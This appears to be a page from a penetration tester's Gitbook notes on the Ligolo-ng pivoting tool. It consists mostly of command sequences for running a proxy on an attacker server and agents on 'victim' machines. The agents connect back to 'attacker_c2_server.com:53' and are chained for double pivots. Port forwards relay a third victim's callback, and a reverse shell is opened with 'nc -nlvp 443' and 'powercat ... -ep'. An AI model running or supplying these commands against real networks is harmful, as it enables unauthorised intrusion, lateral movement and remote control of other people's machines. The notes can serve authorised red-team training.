All Gitbook

Ligolo

LogoGitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub
LogoA Detailed Guide on Ligolo-NgHacking Articles
LogoHow to Tunnel and Pivot Networks using Ligolo-ngLinkedInEditors

Server (proxy)

setup
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

ip addr show ligolo
start server
./proxy -laddr 0.0.0.0:3389 -selfcert

choose a common port (3389, 25, 123) - default 11601

Victim (agent) - single pivot

./agent -connect attacker_c2_server.com:53 -ignore-cert

Server after victim joining

@ligolo chk network config
session 
1

>> agent xx
ifconfig

in same 192.168.w.0/24 subnet, victim has access to 192.168.x.0/24

add corr. network
sudo ip route add 172.16.x.0/24 dev ligolo 
ip route list
@ligolo session
>> agent xx
start
nmap 192.168.x.0/24

Victim 2 (2nd agent) - double pivot

in 2nd agent
./agent -connect attacker_c2_server.com:53 -ignore-cert

Server after victim joining

@ligolo chk network config
session 
2

>> agent yy
ifconfig

the machine in 192.168.x.0/24 has access to 192.168.y.0/24 subnet

add corr. network
sudo ip route add 192.168.y.0/24 dev ligolo 
ip route list
@ligolo session 1
stop

session
2

>> agent yy
start_tunnel

able to switch tunnel simply by start in the 2nd session and choose to close the 1st tunnel via prompt

Port forward in 2nd agent to receive callback from 3rd victim

victim 2 (agent 2) 25 traffics directing to attacker (server) 443 listener

@ligolo session 2
>> agent yy
listener_add --addr 0.0.0.0:25 --to 127.0.0.1:443 --tcp

listener_list
listener_stop

192.168.y.0 subnet machine callback to 192.168.x.0:25 forward to kali at 192.168.w.0:443

listener_add --addr 0.0.0.0:8081 --to 172.16.202.194:8081 --tcp
in 192.168.w.0 kali -
nc -nlvp 443
in 192.168.y.0 machine -
powercat -c 192.168.x.0 -p 25 -ep

Access agent's local port

sudo ip route add 240.0.0.1/32 dev ligolo
nmap 240.0.0.1
PreviousKerberosNextChecklist / Flow

Last updated